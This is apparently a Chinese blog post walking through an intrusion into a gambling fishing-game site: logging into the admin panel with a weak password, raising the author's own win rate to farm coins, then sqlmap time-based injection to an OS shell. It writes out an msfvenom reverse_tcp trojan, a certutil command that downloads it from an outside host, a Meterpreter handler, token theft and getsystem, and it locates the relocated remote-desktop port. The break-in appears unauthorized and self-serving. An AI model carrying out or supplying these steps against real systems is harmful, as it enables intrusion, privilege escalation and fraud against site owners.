某QP站点注入到提权之路

0x01 前言

在某某附近人发来送¥的邀请截图,在QP捕鱼上面把赠送的金额打光之后、随之来做个渗透测试....通过意见反馈打到后台地址以及cookie过期....之后

图片

0x02 开始渗透

开局一个后台

图片

界面挺不错的有点高级高级的感觉,咱先来试试弱口令

图片

咦....直接进去了。随后把账户的胜利调到了百分比

图片

打了一上午鱼之后,金币高达52w

突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧

渗透棋牌不登陆到服务器界面怎么合适呢

图片

咳咳...继续渗透

后台没有上传点 配置文件也不知道路径在哪 ...有点棘手

我们回到登陆框 在账户上加个单引号试试看看有没有sqli

图片

嗯哼..点登陆没反应抓包sqlmap一把梭

图片

嗯...很强 存在延时注入

我们继续看看是否dba权限

图片

ture看来运气很好啊 直接--os-shell

图片

权限有点小啊 ,,,但问题不大 掏出我们的msf

 

msfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马

放置外网方便使我们的目标服务器下载

先在目标服务器创建一个放置木马的文件夹

md c:\test

我们使用certutil.exe进行下载

 

certutil.exe -urlcache -split -f “木马下载地址” C:\test\test.exe

图片

木马下载成功我们回到msf

设置使用exploit/multi/handler模块

图片

设置payload

图片

show options 看看需要配置的参数

图片

set LHOST “外网ip” //于木马的ip一致set LPORT "端口" //于木马的监听端口一致

随后 run执行

图片

紧接着目标服务器运行木马

图片

成功反弹shell

图片

图片

因为我们的权限太小所以我们现在要先进行提权

使用use incognito来加载会话令牌模块

然后list_tokens -u来列出会话令牌

图片

使用impersonate_token "WIN-IGSV8O3CA7E\Administrator" 盗取 administrator 令牌 getuid查看一下

图片

嘿嘿嘿 

图片

最最最后使用getsystem来获取system权限

图片

咳咳 接下来就是shell进入

图片

cmd提取命令一把梭

接下来就是快快乐乐的登陆远程服务器了

美滋滋的~~

(然而事情没那么简单~)

咦....

内部出现错误 咋回事了....难道远程端口被改了吗。。。。

图片

nmap出动扫描一下端口

图片

没有开放3389 ...... 确定以及肯定是改端口了我们回到shell看看

执行 tasklist /svc

找到svchost.exe进程下termservice服务对应的PID

图片

再执行netstat -ano

根据PID号查找对应远程端口,远程端口为5566端口

嘿~这次能完美手工了吧

图片

图片

Very Good~ 

图片

  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值